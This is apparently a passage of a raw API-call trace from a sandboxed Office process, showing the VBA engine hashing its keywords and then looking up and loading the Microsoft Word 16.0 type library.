0x101059 [0067.637] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Base") returned 0x10afa9 [0067.637] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BF") returned 0x105ca5 [0067.637] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Binary") returned 0x1008a0 [0067.637] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Boolean") returned 0x10978e [0067.637] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByRef") returned 0x1074ef [0067.637] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Byte") returned 0x101a83 [0067.637] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByVal") returned 0x1089c5 [0067.637] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Call") returned 0x10744b [0067.637] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Case") returned 0x107547 [0067.637] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CBool") returned 0x104c74 [0067.637] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CByte") returned 0x106d3c [0067.637] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CCur") returned 0x108050 [0067.637] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDate") returned 0x108dc3 [0067.637] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDec") returned 0x10834a [0067.637] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDbl") returned 0x1082e4 [0067.637] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDecl") returned 0x10a0b9 [0067.637] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ChDir") returned 0x10b2fb [0067.637] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CInt") returned 0x109f65 [0067.637] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Circle") returned 0x103fd1 [0067.637] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CLng") returned 0x10af63 [0067.637] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Close") returned 0x1005ab [0067.637] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Compare") returned 0x10af82 [0067.637] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Const") returned 0x10517a [0067.637] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CSng") returned 0x10d4d2 [0067.637] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CStr") returned 0x10d5bb [0067.637] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CurDir") returned 0x101bab [0067.637] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CurDir$") returned 0x10f7cc [0067.637] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CurDir") returned 0x101bab [0067.637] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CVar") returned 0x10e307 [0067.637] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CVDate") returned 0x10cfd6 [0067.637] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CVErr") returned 0x108902 [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Currency") returned 0x10f106 [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Database") returned 0x10eec7 [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Date") returned 0x103b0a [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Date$") returned 0x1031c7 [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Date") returned 0x103b0a [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Debug") returned 0x10eaee [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Decimal") returned 0x1036dd [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Declare") returned 0x104a38 [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefBool") returned 0x1091ad [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefByte") returned 0x10b275 [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefCur") returned 0x10cc45 [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefDate") returned 0x10d2fc [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefDec") returned 0x10cf3f [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefDbl") returned 0x10ced9 [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefInt") returned 0x10eb5a [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefLng") returned 0x10fb58 [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefObj") returned 0x10096b [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefSng") returned 0x102088 [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefStr") returned 0x102171 [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefVar") returned 0x102ebd [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dir") returned 0x1083c9 [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dir$") returned 0x106567 [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dir") returned 0x1083c9 [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Do") returned 0x105cf8 [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DoEvents") returned 0x109634 [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Double") returned 0x100d99 [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Each") returned 0x10fe75 [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Else") returned 0x103b56 [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ElseIf") returned 0x10f307 [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Empty") returned 0x10f4f1 [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EndIf") returned 0x1078bd [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Enum") returned 0x10465a [0067.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Eqv") returned 0x108a4e [0067.639] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Erase") returned 0x1080da [0067.639] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error") returned 0x10db3c [0067.639] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error$") returned 0x10cf60 [0067.639] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error") returned 0x10db3c [0067.639] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Event") returned 0x10ac4b [0067.639] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0067.639] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Explicit") returned 0x10edcb [0067.639] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="F") returned 0x10105d [0067.639] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0067.639] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Fix") returned 0x108e81 [0067.639] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="For") returned 0x108f59 [0067.639] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Format") returned 0x102337 [0067.639] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Format$") returned 0x10efc7 [0067.639] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Format") returned 0x102337 [0067.639] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FreeFile") returned 0x10483a [0067.639] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Friend") returned 0x10bd1c [0067.639] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0067.639] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Get") returned 0x109342 [0067.639] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Global") returned 0x10f88f [0067.639] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Go") returned 0x105d67 [0067.639] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GoSub") returned 0x10b425 [0067.639] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GoTo") returned 0x10d70b [0067.639] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.639] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Imp") returned 0x109f18 [0067.639] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Implements") returned 0x10a988 [0067.639] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="In") returned 0x105db0 [0067.639] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Input") returned 0x10022a [0067.639] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Input$") returned 0x107767 [0067.639] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Input") returned 0x10022a [0067.639] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InputB") returned 0x107785 [0067.639] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InputB$") returned 0x100c59 [0067.639] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InputB") returned 0x107785 [0067.639] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InStr") returned 0x10120e [0067.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InStrB") returned 0x10c2fb [0067.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Int") returned 0x109f41 [0067.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0067.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Is") returned 0x105db5 [0067.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LBound") returned 0x101e0b [0067.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0067.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Len") returned 0x10adf9 [0067.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LenB") returned 0x107cfb [0067.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Let") returned 0x10adff [0067.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Lib") returned 0x10ae81 [0067.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Like") returned 0x1091f3 [0067.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Line") returned 0x109262 [0067.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LINEINPUT") returned 0x1008f1 [0067.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Load") returned 0x10b096 [0067.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Local") returned 0x10353f [0067.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Lock") returned 0x10b0e7 [0067.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Long") returned 0x10b27a [0067.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Loop") returned 0x10b2a8 [0067.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LSet") returned 0x10c69e [0067.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Me") returned 0x105e3b [0067.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid") returned 0x10b3dc [0067.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid$") returned 0x10566d [0067.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid") returned 0x10b3dc [0067.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MidB") returned 0x10568b [0067.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MidB$") returned 0x102a70 [0067.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MidB") returned 0x10568b [0067.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mod") returned 0x10b4ba [0067.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module") returned 0x101ee1 [0067.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Name") returned 0x10f2f0 [0067.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="New") returned 0x10b8b3 [0067.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Next") returned 0x1009bb [0067.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Not") returned 0x10ba23 [0067.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Nothing") returned 0x105f21 [0067.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Null") returned 0x105d87 [0067.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Object") returned 0x102ec1 [0067.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="On") returned 0x105e8e [0067.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Open") returned 0x100767 [0067.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Option") returned 0x10f982 [0067.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Optional") returned 0x10675a [0067.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Or") returned 0x105e92 [0067.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Output") returned 0x10f959 [0067.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ParamArray") returned 0x105941 [0067.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Preserve") returned 0x10a5fc [0067.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Print") returned 0x10f00d [0067.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Private") returned 0x1073c3 [0067.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Property") returned 0x10d2f6 [0067.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PSet") returned 0x10dd55 [0067.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0067.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Put") returned 0x10c5b3 [0067.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RaiseEvent") returned 0x10274a [0067.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Random") returned 0x10f428 [0067.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Randomize") returned 0x10ab02 [0067.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Read") returned 0x101d0f [0067.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ReDim") returned 0x10eea8 [0067.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Rem") returned 0x10ce0e [0067.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Resume") returned 0x10728b [0067.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Return") returned 0x1038eb [0067.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RGB") returned 0x10ce4d [0067.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RSet") returned 0x106891 [0067.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Scale") returned 0x10e596 [0067.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Seek") returned 0x10e387 [0067.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Select") returned 0x10cabd [0067.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Set") returned 0x10d36e [0067.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sgn") returned 0x10d3b2 [0067.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Shared") returned 0x10479e [0067.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Single") returned 0x10a99f [0067.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Spc") returned 0x10d4f4 [0067.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Static") returned 0x1029c6 [0067.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Step") returned 0x103384 [0067.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Stop") returned 0x1034f6 [0067.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="StrComp") returned 0x10274d [0067.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0067.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String$") returned 0x10c31c [0067.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0067.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0067.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tab") returned 0x10d821 [0067.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Text") returned 0x10abed [0067.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="To") returned 0x105f48 [0067.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0067.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Type") returned 0x100007 [0067.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TypeOf") returned 0x101832 [0067.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UBound") returned 0x10ea71 [0067.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unload") returned 0x104e44 [0067.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unlock") returned 0x104e95 [0067.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unknown") returned 0x10a11d [0067.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Until") returned 0x10ecec [0067.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Variant") returned 0x108738 [0067.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Wend") returned 0x1035a7 [0067.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="While") returned 0x10a25c [0067.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Width") returned 0x104e68 [0067.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="With") returned 0x104bed [0067.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WithEvents") returned 0x10f2eb [0067.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Write") returned 0x105c2e [0067.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Xor") returned 0x10ef9b [0067.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#Const") returned 0x10f8c9 [0067.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#Else") returned 0x1050dd [0067.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#ElseIf") returned 0x10e5b5 [0067.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#End") returned 0x10d478 [0067.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#If") returned 0x10d383 [0067.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0067.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Base") returned 0x109fb8 [0067.643] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Control") returned 0x10a946 [0067.643] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Creatable") returned 0x101d92 [0067.643] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Customizable") returned 0x10c26d [0067.643] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Description") returned 0x1009d0 [0067.643] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Exposed") returned 0x1030b3 [0067.643] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Ext_KEY") returned 0x10a88e [0067.643] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_HelpID") returned 0x103e41 [0067.643] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_Func") returned 0x10c92c [0067.643] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_Property") returned 0x107f4a [0067.643] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_PropertyPut") returned 0x106658 [0067.643] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_PropertyPutRef") returned 0x105b25 [0067.643] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_MemberFlags") returned 0x108db7 [0067.643] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Name") returned 0x10e2ff [0067.643] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_PredeclaredId") returned 0x105fc7 [0067.643] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_ProcData") returned 0x107005 [0067.643] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_TemplateDerived") returned 0x109f1e [0067.643] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarDescription") returned 0x103303 [0067.643] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarHelpID") returned 0x10a3b6 [0067.643] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarMemberFlags") returned 0x10b6ea [0067.643] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarProcData") returned 0x101b0c [0067.643] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_UserMemId") returned 0x107b95 [0067.643] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarUserMemId") returned 0x104d5f [0067.643] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_GlobalNameSpace") returned 0x10ce77 [0067.643] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName=",") returned 0x101043 [0067.643] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName=".") returned 0x101045 [0067.643] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="\"") returned 0x101039 [0067.643] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_") returned 0x101076 [0067.643] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CLngPtr") returned 0x105ab0 [0067.643] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefLngPtr") returned 0x1036f2 [0067.643] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PtrSafe") returned 0x106f4a [0067.643] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CLngLng") returned 0x104463 [0067.643] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefLngLng") returned 0x1020a5 [0067.644] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LongLong") returned 0x10378e [0067.644] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LongPtr") returned 0x10d4e8 [0067.644] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="0") returned 0x101047 [0067.644] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="0") returned 0x101047 [0067.644] StringFromGUID2 (in: rguid=0x6860d00*(Data1=0x20905, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x146370, cchMax=39 | out: lpsz="{00020905-0000-0000-C000-000000000046}") returned 39 [0067.644] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x146030 | out: phkResult=0x146030*=0xa22) returned 0x0 [0067.644] RegOpenKeyW (in: hKey=0xa22, lpSubKey="{00020905-0000-0000-C000-000000000046}", phkResult=0x146028 | out: phkResult=0x146028*=0xa1e) returned 0x0 [0067.645] RegEnumKeyW (in: hKey=0xa1e, dwIndex=0x0, lpName=0x146058, cchName=0xa | out: lpName="8.7") returned 0x0 [0067.645] wcscpy_s (in: _Destination=0x146040, _SizeInWords=0xa, _Source="8.7" | out: _Destination="8.7") returned 0x0 [0067.645] RegOpenKeyW (in: hKey=0xa1e, lpSubKey="8.7", phkResult=0x1460e8 | out: phkResult=0x1460e8*=0xac2) returned 0x0 [0067.646] _ultoa_s (in: _Val=0x409, _DstBuf=0x146060, _Size=0xa, _Radix=16 | out: _DstBuf="409") returned 0x0 [0067.646] RegOpenKeyA (in: hKey=0xac2, lpSubKey="409", phkResult=0x146050 | out: phkResult=0x146050*=0x0) returned 0x2 [0067.646] _ultoa_s (in: _Val=0x9, _DstBuf=0x146060, _Size=0xa, _Radix=16 | out: _DstBuf="9") returned 0x0 [0067.646] RegOpenKeyA (in: hKey=0xac2, lpSubKey="9", phkResult=0x146050 | out: phkResult=0x146050*=0x0) returned 0x2 [0067.646] RegOpenKeyA (in: hKey=0xac2, lpSubKey="0", phkResult=0x146050 | out: phkResult=0x146050*=0x9e2) returned 0x0 [0067.647] RegOpenKeyW (in: hKey=0x9e2, lpSubKey="win64", phkResult=0x146058 | out: phkResult=0x146058*=0xb5a) returned 0x0 [0067.648] RegCloseKey (hKey=0xb5a) returned 0x0 [0067.648] RegCloseKey (hKey=0x9e2) returned 0x0 [0067.648] _ultow_s (in: _Value=0x0, _Buffer=0x1460f0, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0067.648] RegOpenKeyW (in: hKey=0xac2, lpSubKey="0", phkResult=0x1460c8 | out: phkResult=0x1460c8*=0xa32) returned 0x0 [0067.649] RegQueryValueW (in: hKey=0xa32, lpSubKey="win64", lpData=0x146110, lpcbData=0x1460c4 | out: lpData="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB", lpcbData=0x1460c4) returned 0x0 [0067.649] wcscpy_s (in: _Destination=0x146440, _SizeInWords=0x104, _Source="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Destination="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0067.650] RegCloseKey (hKey=0xa32) returned 0x0 [0067.650] RegCloseKey (hKey=0xac2) returned 0x0 [0067.650] RegCloseKey (hKey=0xa1e) returned 0x0 [0067.650] RegCloseKey (hKey=0xa22) returned 0x0 [0067.650] LoadTypeLib (in: szFile="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB", pptlib=0x1460c8*=0x0 | out: pptlib=0x1460c8*=0x631b4c0) returned 0x0 [0067.650] ITypeLib:RemoteGetDocumentation (in: This=0x631b4c0, index=-1, refPtrFlags=0x1460e8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x2fcd0e8 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x2fcd0e8) returned 0x0 [0067.651] IUnknown:QueryInterface (in: This=0x631b4c0, riid=0x7fee3b25c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x145ed8 | out: ppvObject=0x145ed8*=0x0) returned 0x80004002 [0067.651] ITypeLib:RemoteGetLibAttr (in: This=0x631b4c0, ppTLibAttr=0x145ed0, pDummy=0x10 | out: ppTLibAttr=0x145ed0, pDummy=0x10) returned 0x0 [0067.651] ITypeLib:RemoteGetDocumentation (in: This=0x631b4c0, index=-1, refPtrFlags=0x0, pbstrName=0x145ec8, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x6876ca0 | out: pbstrName=0x145ec8*="Microsoft Word 16.0 Object Library", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x6876ca0*="\xf7db\x7fe") returned 0x0 [0067.651] StringFromGUID2 (in: rguid=0x6884520*(Data1=0x20905, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x145ef0, cchMax=39 | out: lpsz="{00020905-0000-0000-C000-000000000046}") returned 39 [0067.651] _ultow_s (in: _Value=0x8, _Buffer=0x145e3a, _BufferCount=0x10, _Radix=16 | out: _Buffer="8") returned 0x0 [0067.651] _ultow_s (in: _Value=0x7, _Buffer=0x145e3e, _BufferCount=0xe, _Radix=16 | out: _Buffer="7") returned 0x0 [0067.651] _ultow_s (in: _Value=0x0, _Buffer=0x145e42, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0067.651] wcscpy_s (in: _Destination=0x429ce88, _SizeInWords=0x8e, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0067.651] wcscpy_s (in: _Destination=0x429ce8e, _SizeInWords=0x8b, _Source="{00020905-0000-0000-C000-000000000046}" | out: _Destination="{00020905-0000-0000-C000-000000000046}") returned 0x0 [0067.651] wcscpy_s (in: _Destination=0x429ceda, _SizeInWords=0x65, _Source="#8.7#0#" | out: _Destination="#8.7#0#") 